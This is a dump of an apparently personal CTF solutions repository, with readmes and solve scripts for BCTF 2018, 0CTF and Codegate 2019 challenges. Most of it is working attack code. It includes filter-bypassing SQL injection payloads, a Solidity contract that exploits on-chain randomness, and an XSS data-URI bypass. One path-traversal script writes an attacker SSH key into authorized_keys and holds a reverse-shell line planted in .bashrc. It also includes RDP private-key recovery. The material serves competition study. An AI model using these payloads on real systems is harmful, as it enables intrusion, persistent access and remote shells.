├── 2018 └── bctf │ ├── BCTF Write-Up (LeaveCat).pdf │ ├── babysqli │ ├── flag.txt │ ├── readme.md │ └── run.py │ ├── eosgame │ ├── exploit.sol │ ├── flag.txt │ └── readme.md │ ├── fake3d │ ├── exploit.sol │ ├── flag.txt │ └── readme.md │ └── simplevn │ ├── exploit.html │ ├── flag.png │ └── readme.md ├── 2019 ├── 0ctf_final │ ├── babydb │ │ ├── readme.md │ │ └── solve.py │ └── insecure_rdp │ │ ├── image1.png │ │ ├── image2.png │ │ └── readme.md ├── codegate │ ├── kingmaker │ │ └── solve.py │ ├── pyprot3ct │ │ ├── chal.py │ │ ├── code │ │ ├── dec.py │ │ ├── play.py │ │ └── solve.py │ └── rich-project │ │ └── sqli.py ├── codegate_final │ ├── 2048_map │ │ ├── .gdb_history │ │ └── solve.py │ ├── bash_adventure │ │ └── solve.sh │ ├── readme.md │ └── shage_beta │ │ ├── a.py │ │ ├── readme.md │ │ ├── xx.py │ │ └── z.py ├── defcon │ ├── gloryhost │ │ ├── readme.md │ │ └── solve.c │ ├── lcars │ │ ├── readme.md │ │ └── solve_first.py │ ├── readme.md │ └── rtoos │ │ ├── readme.md │ │ └── solve.py ├── defcon_final │ ├── aoool │ │ └── self_backdoor.py │ ├── jtaste │ │ └── solve.py │ └── telooogram │ │ ├── exploit.py │ │ └── poll_submit_flag.py ├── gctf │ ├── bnv │ │ └── readme.md │ ├── devmaster8000 │ │ └── readme.md │ ├── doomed_to_repeat_it │ │ └── readme.md │ └── glotto │ │ └── readme.md ├── insomnihack │ ├── 1118daysober │ │ ├── a.c │ │ ├── b.c │ │ ├── build_exp.sh │ │ ├── build_leak.sh │ │ ├── libc.s │ │ └── readme.md │ └── l33t-hoster │ │ ├── ..htaccess │ │ ├── build.sh │ │ ├── exp.txt │ │ ├── hack.c │ │ ├── juno.asdf │ │ └── readme.md ├── midnightctf │ └── hfsipc │ │ ├── exploit.c │ │ └── make.sh ├── opcde_mini │ ├── custom_printf_public │ │ ├── readme.md │ │ └── solve.py │ └── misconf_public │ │ ├── main.py │ │ └── readme.md ├── plaid │ ├── potent │ │ └── solve.py │ ├── spectre │ │ ├── readme.md │ │ └── upload_server.py │ └── triggerd │ │ └── solve.py └── realworld │ └── mop │ ├── drop.py │ ├── exp.py │ └── readme.md ├── 2020 └── confidence-pre │ ├── angry-defender.md │ 
├── images │ └── 1.png │ ├── juno.exe │ └── two-sandbox-challs.md ├── 2021 └── defcon │ └── readme.md ├── .gitignore ├── README.md └── WhiteHat Grand Prix 06 - KingTigerPrawn - Write Up.pdf /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | .gdb_history 3 | -------------------------------------------------------------------------------- /2018/bctf/BCTF Write-Up (LeaveCat).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2018/bctf/BCTF Write-Up (LeaveCat).pdf -------------------------------------------------------------------------------- /2018/bctf/babysqli/flag.txt: -------------------------------------------------------------------------------- 1 | BCTF{060950FB-839E-4B57-B91D-51E78F56856F} 2 | -------------------------------------------------------------------------------- /2018/bctf/babysqli/readme.md: -------------------------------------------------------------------------------- 1 | # Babysqli 2 | 3 | - The description told me this is not the finished web server. 4 | - As far as I know, the hints feature isn't implemented yet. 5 | - But there were two backend API paths. 6 | - /api/captcha 7 | - /api/hints 8 | - /api/hints has an error-based SQLi vulnerability, but there were so many filters. 9 | 10 | ```javascript 11 | function checkHint (hint) { 12 | return ! / |;|\+|-|\*|\/|<|>|~|!|\d|%|\x09|\x0a|\x0b|\x0c|\x0d|`|gtid_subset|hash|json|st\_|updatexml|extractvalue|floor|rand|exp|json_keys|uuid_to_bin|bin_to_uuid|union|like|sleep|benchmark/ig.test(hint) 13 | } 14 | ``` 15 | 16 | - Also there was a length limit.
(<140) 17 | - It was hard to exploit :( 18 | 19 | 20 | ## Payload 21 | 22 | ``` 23 | 'or(select(GTID_SUBTRACT((select(group_concat(column_name))from(information_schema.columns)where(mid(table_name,true,true)='V')),true)))# 24 | 'or(select(GTID_SUBTRACT((select(ZSLRSrpOlCCysnaHUqCEIjhtWbxbMlDkUO)from(vhEFfFlLlLaAAaaggIiIIsSSHeReEE)),true)))# 25 | ``` 26 | -------------------------------------------------------------------------------- /2018/bctf/babysqli/run.py: -------------------------------------------------------------------------------- 1 | from requests import Session 2 | import multiprocessing 3 | import hashlib 4 | from time import sleep 5 | 6 | 7 | class User(object): 8 | captcha = '' 9 | s = None 10 | 11 | REGISTER_URL = 'http://47.93.100.42:9999/api/register' 12 | LOGIN_URL = 'http://47.93.100.42:9999/api/login' 13 | GET_CAPTCHA_URL = 'http://47.93.100.42:9999/api/captcha' 14 | HINT_URL = 'http://47.93.100.42:9999/api/hints' 15 | 16 | HEADERS = { 17 | 'Content-Type': 'application/x-www-form-urlencoded' 18 | } 19 | 20 | def __init__(self, username, password): 21 | self.s = Session() 22 | 23 | u_data = {'username': username, 'password': password} 24 | 25 | self.s.post(self.REGISTER_URL, headers=self.HEADERS, data=u_data) 26 | c = self.s.post(self.LOGIN_URL, headers=self.HEADERS, data=u_data) 27 | 28 | if c.text != '{"msg":"login success"}': 29 | raise IndexError 30 | 31 | def set_captcha(self): 32 | c = self.s.get(self.GET_CAPTCHA_URL) 33 | self.captcha = c.text.split('"captcha":"')[1].split('"')[0].strip() 34 | 35 | def go_sqli(self, code, query): 36 | data = {'captcha': str(code), 'hint': query} 37 | c = self.s.post(self.HINT_URL, headers=self.HEADERS, data=data) 38 | return c.text 39 | 40 | 41 | def set_captcha(d): 42 | user = d['user'] 43 | i = 0 44 | user.set_captcha() 45 | 46 | while True: 47 | if hashlib.md5(str(i)).hexdigest()[0:6] == user.captcha: 48 | d['code'] = i 49 | return i 50 | i += 1 51 | 52 | 53 | WORKER = 20 54 | USERNAME_PREFIX = 
'junoXXXXXXMM' 55 | PASSWORD = 'dlawnsdh1234' 56 | 57 | with multiprocessing.Manager() as manager: 58 | user_list = [] 59 | 60 | for i in xrange(WORKER): 61 | d = manager.dict() 62 | d['user'] = User('{}{}'.format(USERNAME_PREFIX, i), PASSWORD) 63 | user_list.append(d) 64 | 65 | mul_list = [] 66 | 67 | for i in xrange(len(user_list)): 68 | mul_list.append(multiprocessing.Process(target=set_captcha, args=(user_list[i],))) 69 | mul_list[i].start() 70 | 71 | while True: 72 | for i in xrange(len(mul_list)): 73 | if not mul_list[i].is_alive(): 74 | result = user_list[i]['user'].go_sqli(user_list[i]['code'], raw_input(">")) 75 | print 'result:', result 76 | print '-------------------' 77 | user_list[i]['user'] = User('{}{}'.format(USERNAME_PREFIX, i), PASSWORD) 78 | mul_list[i] = multiprocessing.Process(target=set_captcha, args=(user_list[i],)) 79 | mul_list[i].start() 80 | 81 | -------------------------------------------------------------------------------- /2018/bctf/eosgame/exploit.sol: -------------------------------------------------------------------------------- 1 | contract Attack { 2 | 3 | address targetContract = 0x804d8B0f43C57b5Ba940c1d1132d03f1da83631F; 4 | int betCount = 0; 5 | 6 | function init() public { 7 | EOSGame(targetContract).initFund(); 8 | betCount = 1; 9 | } 10 | 11 | function exploit() public returns (int) { 12 | 13 | if (isWin()) { 14 | EOSGame(targetContract).bigBlind(); 15 | betCount += 1; 16 | return 1; 17 | } else { 18 | revert(); 19 | return 0; 20 | } 21 | } 22 | 23 | function getFlag() public { 24 | EOSGame(0x4082cC8839242Ff5ee9c67f6D05C4e497f63361a).CaptureTheFlag("anVub3JvdXNlQGdtYWlsLmNvbQ=="); 25 | } 26 | 27 | function getBetCount() public view returns (int) { 28 | return betCount; 29 | } 30 | 31 | function isWin() returns (bool) { 32 | uint256 seed = uint256(keccak256(abi.encodePacked(block.number)))+uint256(keccak256(abi.encodePacked(block.timestamp))); 33 | uint256 seed_hash = uint256(keccak256(abi.encodePacked(seed))); 34 | 
uint256 shark = seed_hash % 20; // 20 35 | uint256 lucky_hash = uint256(keccak256(abi.encodePacked(betCount))); 36 | uint256 lucky = lucky_hash % 20; // 20 37 | 38 | return shark==lucky; 39 | } 40 | 41 | function viewIsWin(uint256 fuckCount) public view returns (bool) { 42 | uint256 seed = uint256(keccak256(abi.encodePacked(block.number)))+uint256(keccak256(abi.encodePacked(block.timestamp))); 43 | uint256 seed_hash = uint256(keccak256(abi.encodePacked(seed))); 44 | uint256 shark = seed_hash % 20; // 20 45 | uint256 lucky_hash = uint256(keccak256(abi.encodePacked(fuckCount))); 46 | uint256 lucky = lucky_hash % 20; // 20 47 | 48 | return shark==lucky; 49 | } 50 | 51 | function goCalc() public returns (uint256){ 52 | uint256 x = (EOSGame(targetContract).bet_count(msg.sender)); 53 | for (uint256 i=x; i 2 | #iframe1 { 3 | width: 100%%; 4 | height: 8000px; 5 | position:absolute; 6 | margin-top: -2000px; 7 | 8 | } 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /2018/bctf/simplevn/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2018/bctf/simplevn/flag.png -------------------------------------------------------------------------------- /2018/bctf/simplevn/readme.md: -------------------------------------------------------------------------------- 1 | # SimpleVN 2 | 3 | - By pass host check with data scheme. 
4 | - `data:text/html;base64,PGlmcmFtZSBzdHlsZT0nd2lkdGg6MTAwJTsgaGVpZ2h0OjEwMCU7JyBzcmM9J2h0dHA6Ly94LmltanVuby5jb20vZXhwbG9pdC5odG1sJz48L2lmcmFtZT4=` 5 | - `` 6 | 7 | 8 | ![flag.png](flag.png) 9 | -------------------------------------------------------------------------------- /2019/0ctf_final/babydb/readme.md: -------------------------------------------------------------------------------- 1 | # babydb 2 | 3 | ## vuln (three-lines) 4 | 5 | ```ocaml 6 | | true, name when name = (SessionState.access user) -> 7 | let res = SessionState.put name in 8 | SessionState.bind res (fun _ -> SessionState.return (cont^"login|")) 9 | ``` 10 | 11 | If execution reaches the code path above, we can set an arbitrary name. 12 | I don't know why, but when we put "login?user?pass?c:login???:store?a?b?c" into the `batch` command (via RBTree_Pg_), 13 | `user` => `''`, `args` => `a`. (hooray, we get arbitrary file r/w). 14 | 15 | ## exploit 16 | 17 | We can read an arbitrary file, but only its first line. I got the `your flag here:` message when I read `../../../../../../flag`. I had to get code execution to read the whole flag. 18 | I was not on-site. I asked my teammate "Is port 22 open?", he said yes, and I changed the contents of `/home/user/.ssh/authorized_keys` to mine.
19 | 20 | ```shell 21 | $ cat flag 22 | your flag here: 23 | flag{I_want_to_give_web_challenges_a_try_but_still_looks_like_misc_lol} 24 | $ 25 | ``` 26 | -------------------------------------------------------------------------------- /2019/0ctf_final/babydb/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.7 2 | from requests import post 3 | 4 | URL = 'http://localhost:8000/' 5 | URL = 'http://localhost:31339/' 6 | 7 | def read(path): 8 | c = post(URL+'batch/?a', data="login?junoim?ABCD?c:login???c:load?../../../../../{path}?b?c".format(path=path)) 9 | print c.content 10 | 11 | def write(path, data): 12 | c = post(URL+'batch/?a', data="login?junoim?ABCD?c:login???c:store?../../../../../{path}?{data}?c".format(path=path, data=data)) 13 | print c.content 14 | 15 | ''' 16 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDYozuBzf1ym5Gd0Mp5TTvre9V4CirnFNSUjC1jSIip8Haag8RFMwbYfi74DuRqOGMohvZ+xjq1Tiraxcof5ZwXXZBaDrFkLFF+sHgx4+4tnXmlRjMYzQDKSMhn36u1MhMHlLKR+oOe8bVWwFMQoT66bGpZ/kN40vSsp8xD2rFbOsY+qYdyGEN3rl7JY1JhTdzIbRZp1dI57AmFMmm/JptB8RQdlBt5tujKLnKohpN2LPD9csb8hLP15Y2IQ1hYbmdI3qkOTYCrYoXFHpeo4t4MInTrqa/orFsHkGai0kYzhn1ZjXlOhe+9VwJjhDZXObpZxNxrlLimMHgN655hRFC7g5tSrBQ4HFZHNFOwiQpFqAGHbCoCHWMYNvdm38J+kUp/4MCyhze18GoNJZSahYM4RgP+cqXor7ENtfBrfAXUTw5mKSTy2CFwwX3Gtwgxoh4sVEIbDLclVCaLL7Tl8OHNfpAz7J6/D8v6oxib5o+FQQrl1zTE18Qtz6AeBxpQ0h8A37e97jbI4ZIRCOoVK5pjO3zQXoTvFV4DbZF+67LtpaGpx2zmcWN58xosnZXOvaaV7OUeeSIaHQ2TPnbtSHneYXzuzEfDywYLNJdZeHRewxKTxDcYrLGW5MAndCzvX5OV0Ly02E/1CU2o6yO/MkGOAX56qb5lPkQBNgHpqpD9vw== blah 17 | ''' 18 | 19 | if __name__ == '__main__': 20 | ''' 21 | post(URL+'register/?junoim', data="ABCD") 22 | 23 | read('../../../../../../../etc/passwd') 24 | write('../../../../../../tmp/1234', 'this is junoim\nwelldone') 25 | write('../abcd', 'this is junoim\nwelldone') 26 | read('../../../../../../tmp/1234') 27 | read('flag') 28 | read('../flag') 29 | read('../../flag') 30 | read('../../../flag') 31 | 
read('../../../../flag') 32 | read('../../../../../flag') 33 | ''' 34 | 35 | # read('/proc/self/environ') 36 | # read('/etc/supervisor/supervisord.conf') 37 | # read('/etc/supervisor/supervisord.conf') 38 | write('/home/user/.ssh/authorized_keys', 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDU89+PF5dAUsfQU3DLerhV11gsO4WaNlG6qxXzFQDyGanmDa7xGj+F2TfJgKXZRLsphTvAHetqsIiM587h8twuJc7dX6rRcs0N4Q6l0WixSYcUJtAMQerZ2+RKrw7tG5+0NCa8RLhi3Oe/Oay7gIPG0QlHIwU8LmF18HbwsL59Qqbb0550bRv4+ual771ExY2HSKHn+vXVeN84SukyVJRSAjtfGfV0kkRKkBebphdyMnyQnj98VkoJNNtxAI2bzHEuP628Wh3F9dGZa5a50N0AuSDiRxWnVZYn47E5DVTTDak/s/zBryVk2y7EIuLsoj3GUK2DYxImQWZx+S1nCtNP asdf') 39 | read('/home/user/.ssh/authorized_keys') 40 | 41 | if False: 42 | write('../../../../../../../home/user/.bashrc', 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') 43 | -------------------------------------------------------------------------------- /2019/0ctf_final/insecure_rdp/image1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2019/0ctf_final/insecure_rdp/image1.png -------------------------------------------------------------------------------- /2019/0ctf_final/insecure_rdp/image2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2019/0ctf_final/insecure_rdp/image2.png -------------------------------------------------------------------------------- /2019/0ctf_final/insecure_rdp/readme.md: -------------------------------------------------------------------------------- 1 | # Insecure RDP 2 | 3 | > aka super-guess challenge 4 | 5 | ## Attempt 1 6 | 7 | Old-rdp uses rc4 128 bit encryption for secure-connection. To make rc4 encryption key rdp uses RSA asymmetric crypto, btw the key is really short(512 bit). 8 | 9 | At the first time, I mistaken the bytes are right order. 
10 | I took that number (N) and searched for it on factordb. (http://factordb.com/index.php?query=8585773518239202618014259252265007041474576494007326305566936231179558082498454385604139747248680116141231666404283485452921757852460000935905449875937236) 11 | Sadly it could not be N, since it is not of the form (prime1 * prime2). 12 | 13 | Then I noticed that the bytes are in reverse order. (http://factordb.com/index.php?query=11108191436132586895020456675719608627041223049898764263726511071041880035545059834370244436455550875653187155250844471535388827581310104544771906189127331) 14 | But I can't find its private key..... 15 | 16 | ## Attempt 2 17 | 18 | I looked at the pcap file again, slowly. I figured out that `serverCertificate` differs slightly from the one in regular RDP packets. 19 | 20 | ![image1.png](image1.png) 21 | 22 | Normal RDP packets do not contain the `RSA2` part. Yes, this is the format of an LSA secret. :( 23 | 24 | ``` 25 | C:\>LsaSecretReader.exe L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75 26 | ====================================================== 27 | = LSA secret reader by Passcape Software = 28 | = Visit http://www.passcape.com for more information = 29 | ====================================================== 30 | 31 | 0000: 52 53 41 32 48 00 00 00 00 02 00 00 3F 00 00 00 32 | 0010: 01 00 01 00 ED F1 18 33 9E 6C F3 08 88 CA D5 2A 33 | 0020: 43 92 15 47 E3 CE 96 2E B3 63 97 85 DC 24 33 58 34 | 0030: 8A 8C 89 E2 16 06 C2 39 40 95 D8 C4 81 60 45 81 35 | 0040: 8E 00 7D 26 17 8F F5 C7 9D 7A 46 1B 03 83 6B DF 36 | 0050: 66 60 DA BD 00 00 00 00 00 00 00 00 C5 2E C2 9A 37 | 0060: CD 5C 85 91 09 37 C7 45 A8 76 C3 9F E8 AD D6 D6 38 | 0070: 21 2B 44 FF 9A 5B 99 70 62 88 24 ED 00 00 00 00 39 | 0080: 09 E9 24 CA 37 F3 88 DE B2 E5 02 BF F7 4B E9 C2 40 | 0090: 0C 28 D3 D8 40 72 6F 49 D2 CC E6 D3 62 2D F3 CC 41 | 00A0: 00 00 00 00 CD 0B 24 05 48 0A CA A0 F6 54 5B 32 42 | 00B0: A2 0F 3F AB EC 2A DF C9 BD D7 FB BE C0 D1 E6 CA 43 | 00C0: 25 5A C5 E3 00 00 00 00 B9 D7 FD 7F EB 
AB EF D5 44 | 00D0: 57 10 F0 6C F5 76 9B 79 9E 91 E3 D4 7F C7 74 71 45 | 00E0: C1 C7 2E 67 B3 DE 49 17 00 00 00 00 3B 44 55 4B 46 | 00F0: 46 21 AC 8F 38 A6 A8 A5 D7 06 31 0D 2A DA D1 D6 47 | 0100: E4 2C ED D9 4F A4 D3 6D 35 E4 54 06 00 00 00 00 48 | 0110: 81 E9 5D D8 37 C1 AD C5 A6 82 02 CF A7 D0 1D 9F 49 | 0120: AE 10 C9 9F 69 0A CD C4 58 BD 76 DE 3C DC 9D 7F 50 | 0130: 1E 31 D1 C0 AD 2F A8 9B 84 33 73 5C 5D CE 29 D7 51 | 0140: 12 60 41 D6 2C AD 3F 70 A7 24 8C 60 E9 48 82 39 52 | 0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 | 0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 | 0170: 00 00 00 00 00 00 00 00 00 00 00 00 55 | 56 | This gives public key of: 57 | 52 53 41 31 48 00 00 00 00 02 00 00 3f 00 00 00 58 | 01 00 01 00 ed f1 18 33 9e 6c f3 08 88 ca d5 2a 59 | 43 92 15 47 e3 ce 96 2e b3 63 97 85 dc 24 33 58 60 | 8a 8c 89 e2 16 06 c2 39 40 95 d8 c4 81 60 45 81 61 | 8e 00 7d 26 17 8f f5 c7 9d 7a 46 1b 03 83 6b df 62 | 66 60 da bd 00 00 00 00 00 00 00 00 63 | 64 | ..and private key of 65 | 81 e9 5d d8 37 c1 ad c5 a6 82 02 cf a7 d0 1d 9f 66 | ae 10 c9 9f 69 0a cd c4 58 bd 76 de 3c dc 9d 7f 67 | 1e 31 d1 c0 ad 2f a8 9b 84 33 73 5c 5d ce 29 d7 68 | 12 60 41 d6 2c ad 3f 70 a7 24 8c 60 e9 48 82 39 69 | ``` 70 | 71 | ![image2.png](image2.png) 72 | 73 | ```shell 74 | root@junoim-deploy:~/0ctf/RDP-Replay# cat /tmp/aaa.txt 75 | aa,5253413148000000000200003f00000001000100a3ee630330a342da4c477e0a1012539dbf8533188d24f8ed822d69f26950ebce783c144a619465e6d2abd43efea475fbd8a45e6905b951ffebe931c66eb517d40000000000000000,41D130517AB164326D6B6D4A3620B4839B6126C72E03D38F7D7A7523C568F8D84E24147BD1377754D700C10B441E5FD13FE69B70F6BCC3B93609092451D72641 76 | root@junoim-deploy:~/0ctf/RDP-Replay# replay/rdp_replay -r /tmp/out.pcap -l /tmp/aaa.txt --save_clipboard --show_keys > output3 77 | root@junoim-deploy:~/0ctf/RDP-Replay# cat output3 78 | Processed 1 private keys 79 | 1440x900x8 80 | We have the private key for this server: aa 81 | error: no keyboard mapping 
available! 82 | Warning xf_GetWindowProperty (142): Property 314 does not exist 83 | rnotepad 84 | flag{}779a099914144e6c512b0581 85 | ``` 86 | -------------------------------------------------------------------------------- /2019/codegate/kingmaker/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import sys 3 | 4 | context.arch = 'amd64' 5 | context.terminal = ['tmux', 'splitw', '-h'] 6 | KT = [ 7 | '', 8 | 'lOv3\x00', 9 | 'D0l1', 10 | 'HuNgRYT1m3', 11 | 'F0uRS3aS0n', 12 | 'T1kT4kT0Kk', 13 | ] 14 | 15 | i0 = i1 = i2 = i3 = i4 = i5 = i6 = i7 = i8 = i9 = i10 = 0 16 | 17 | 18 | ''' 19 | for i0 in xrange(1, 3): 20 | for i1 in xrange(3): 21 | open('count', 'wb').write(str(i0) + ',' + str(i1)) 22 | for i2 in xrange(3): 23 | for i3 in xrange(2): 24 | for i4 in xrange(2): 25 | for i5 in xrange(9): 26 | for i7 in xrange(2): 27 | for i8 in xrange(3): 28 | for i9 in xrange(3): 29 | for i10 in xrange(2): 30 | 31 | ''' 32 | 33 | i0 = 1 34 | i1 = 2 35 | i2 = 1 36 | i3 = 0 37 | i4 = 1 38 | i5 = 5 39 | i6 = 0 40 | i7 = 0 41 | i8 = 0 42 | i9 = 2 43 | i10 = 0 44 | 45 | # r = process('./d') 46 | r = remote('110.10.147.104', 13152) 47 | 48 | r.sendline('1') 49 | r.sendline(KT[1]) 50 | r.sendline('1') 51 | r.sendline('2') 52 | 53 | def x1(q): 54 | if q == 0: r.sendline('1') 55 | elif q == 1: r.sendline('2') 56 | elif q == 2: r.sendline('3') 57 | 58 | def x2(q): 59 | if q == 0: r.sendline('1') 60 | elif q == 1: r.sendline('2') 61 | elif q == 2: r.sendline('3') 62 | 63 | def x3(q): # PASS_1 64 | if q == 0: 65 | r.sendline('1') 66 | elif q == 1: 67 | r.sendline('2') 68 | r.sendline('1') 69 | x4(i3) 70 | elif q == 2: 71 | r.sendline('3') 72 | r.sendline('1') 73 | 74 | def x4(q): 75 | if q == 0: 76 | r.sendline('1') 77 | elif q == 1: 78 | r.sendline('2') 79 | 80 | 81 | def x5(q): 82 | if q == 0: 83 | r.sendline('1') 84 | r.sendline('2') 85 | r.sendline('2') 86 | elif q == 1: 87 | r.sendline('2') 88 | if i10 == 0: 89 | 
r.sendline('1') 90 | elif i10 == 1: 91 | r.sendline('2') 92 | 93 | def x6(q): 94 | if q == 0: 95 | r.sendline('1') 96 | r.sendline('1') 97 | r.sendline('2') 98 | elif q == 1: 99 | r.sendline('1') 100 | r.sendline('2') 101 | r.sendline('1') 102 | elif q == 2: 103 | r.sendline('1') 104 | r.sendline('2') 105 | r.sendline('3') 106 | 107 | elif q == 3: 108 | r.sendline('2') 109 | r.sendline('1') 110 | r.sendline('2') 111 | elif q == 4: 112 | r.sendline('2') 113 | r.sendline('2') 114 | r.sendline('1') 115 | elif q == 5: 116 | r.sendline('2') 117 | r.sendline('2') 118 | r.sendline('3') 119 | 120 | elif q == 6: 121 | r.sendline('3') 122 | r.sendline('1') 123 | r.sendline('2') 124 | elif q == 7: 125 | r.sendline('3') 126 | r.sendline('2') 127 | r.sendline('1') 128 | elif q == 8: 129 | r.sendline('3') 130 | r.sendline('2') 131 | r.sendline('3') 132 | 133 | def x7(q): 134 | if q == 0: 135 | r.sendline('1') 136 | r.sendline('2') 137 | elif q == 1: 138 | r.sendline('2') 139 | if i7 == 0: 140 | r.sendline('1') 141 | elif i7 == 1: 142 | r.sendline('2') 143 | 144 | def x8(q): 145 | if q == 0: 146 | r.sendline('1') 147 | r.sendline('2') 148 | elif q == 1: 149 | r.sendline('2') 150 | elif q == 2: 151 | r.sendline('1') 152 | r.sendline('1') 153 | r.sendline('2') 154 | 155 | 156 | def x9(q): 157 | if q == 0: 158 | r.sendline('2') 159 | r.sendline('1') 160 | r.sendline('1') 161 | elif q == 1: 162 | r.sendline('2') 163 | r.sendline('1') 164 | r.sendline('2') 165 | elif q == 2: 166 | r.sendline('3') 167 | r.sendline('2') 168 | 169 | x1(i0) 170 | x2(i1) 171 | 172 | r.sendline(KT[2]) 173 | r.sendline('1') 174 | 175 | x3(i2) 176 | x5(i4) 177 | 178 | # r.sendline('1') 179 | # r.sendline('1') 180 | # r.sendline('2') 181 | # r.sendline('2') 182 | 183 | 184 | r.sendline(KT[3]) 185 | 186 | x6(i5) 187 | 188 | r.sendline(KT[4]) 189 | 190 | r.sendline('1') 191 | r.sendline('1') 192 | r.sendline('\x00') # BUG 193 | 194 | x8(i8) 195 | 196 | r.sendline(KT[5]) 197 | 198 | x9(i9) 199 | 200 | # 
context.log_level = 'debug' 201 | r.recvuntil('King : Congratuations for pass all the tests.') 202 | r.recvuntil('SYSTEM : Your point\n') 203 | data = r.recvuntil('King : Wh').split('\n') 204 | print data 205 | 206 | w = [] 207 | for i in xrange(5): 208 | w.append(int(data[i][-1])) 209 | 210 | print w 211 | 212 | juno = True 213 | for asdf in xrange(5): 214 | if w[asdf] != 5: 215 | juno = False 216 | break 217 | 218 | 219 | print i0 ,i1 , i2 , i3 , i4 , i5 , i6 , i7 , i8 , i9, i10 220 | 221 | if juno: 222 | print 'FOUND!!!!!!!!!!!!!!' 223 | r.interactive() 224 | 225 | r.close() 226 | 227 | 228 | 229 | -------------------------------------------------------------------------------- /2019/codegate/pyprot3ct/chal.py: -------------------------------------------------------------------------------- 1 | import play 2 | 3 | f = open("code", "rb") 4 | code = f.read() 5 | code = bytearray(code) 6 | f.close() 7 | 8 | flag = input().strip() 9 | flag = bytearray(flag, "utf-8") 10 | 11 | if play.first_call(code, flag): 12 | print(":)") 13 | else: 14 | print(":(") -------------------------------------------------------------------------------- /2019/codegate/pyprot3ct/code: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/junorouse/ctf/f27aee83b98117427795e6e3a091f363351a0bc8/2019/codegate/pyprot3ct/code -------------------------------------------------------------------------------- /2019/codegate/pyprot3ct/dec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | res = 15164928151071436234 3 | 4 | for i in range(127): 5 | res = ((res << 7) & 2**64-1) | res >> 0x39 6 | res = (res >> 0x20) | ((res & (2**32-1)) << 32) 7 | n1 = res & 2**32-1 8 | n2 = res >> 0x20 9 | n1 = ((n1 - 0xffc2bdec) & 2**32-1) ^ 0xffc2bdec 10 | n2 = ((n2 - 0xffc2bdec) & 2**32-1) ^ 0xffc2bdec 11 | res = n1 << 32 | n2 12 | 13 | X = hex(res)[2:-1] 14 | print X[8:].decode('hex') + 
X[0:8].decode('hex') 15 | -------------------------------------------------------------------------------- /2019/codegate/pyprot3ct/play.py: -------------------------------------------------------------------------------- 1 | def SAVE_TO_INT(_SAVE): 2 | KEY=_SAVE[2001] 3 | KEY=KEY.decode("utf-8") 4 | VALUE=_SAVE[2002] 5 | VALUE=VALUE.decode("utf-8") 6 | VALUE=int(VALUE) 7 | _SAVE[KEY]=VALUE 8 | return 9 | 10 | def O0O000000OO0OOO0O(OO000OO00000OO0OO): 11 | OOOO000O000OO0O0O=2001 12 | OO0OO0OOOOOOO0OO0=2002 13 | 14 | O0O000O000OOO0OO0=OO000OO00000OO0OO[2001] 15 | O0O000O000OOO0OO0=O0O000O000OOO0OO0.decode("utf-8") 16 | 17 | O0O0OO00OOO0O0OO0=OO000OO00000OO0OO[2002] 18 | O0O0OO00OOO0O0OO0=O0O0OO00OOO0O0OO0.decode("utf-8") 19 | 20 | O0O0OO00OOO0O0OO0=OO000OO00000OO0OO[O0O0OO00OOO0O0OO0] 21 | OO000OO00000OO0OO[O0O000O000OOO0OO0]=O0O0OO00OOO0O0OO0 22 | return 23 | 24 | def GET_FLAG_BY_IDX(OO0OO0O0O0OOOO0O0): 25 | arg1=OO0OO0O0O0OOOO0O0[2001] 26 | arg1=arg1.decode("utf-8") 27 | arg2=OO0OO0O0O0OOOO0O0[2002] 28 | arg2=arg2.decode("utf-8") 29 | arg2=OO0OO0O0O0OOOO0O0[arg2] # FLAG 30 | 31 | O0000000OOOO0OOO0=OO0OO0O0O0OOOO0O0[2003] 32 | O0000000OOOO0OOO0=O0000000OOOO0OOO0.decode("utf-8") 33 | 34 | if O0000000OOOO0OOO0.isdigit(): 35 | O0000000OOOO0OOO0=int(O0000000OOOO0OOO0) 36 | else: 37 | O0000000OOOO0OOO0=OO0OO0O0O0OOOO0O0[O0000000OOOO0OOO0] 38 | 39 | OO0OOOOO000OO0OOO=arg2[O0000000OOOO0OOO0] 40 | 41 | print("SAVE[{}] = FLAG[{}]".format(arg1, O0000000OOOO0OOO0)) 42 | OO0OO0O0O0OOOO0O0[arg1]=OO0OOOOO000OO0OOO 43 | return 44 | def O0O0O0000O00OO00O(O000O000O00000O0O): 45 | OO0OO0OO00O0OO0OO=2001 46 | OO0OO0OOO000000O0=2002 47 | OOOO00OOO0OO00O00=2003 48 | O0O0O0OO0O0O00O00=2004 49 | O00000O000O0000OO=O000O000O00000O0O[OO0OO0OO00O0OO0OO] 50 | O00000O000O0000OO=O00000O000O0000OO.decode("utf-8") 51 | O0O00000O00OOO000=O000O000O00000O0O[OO0OO0OOO000000O0] 52 | O0O00000O00OOO000=O0O00000O00OOO000.decode("utf-8") 53 | OO0O00O0OO0OO0000=O000O000O00000O0O[OOOO00OOO0OO00O00] 54 | 
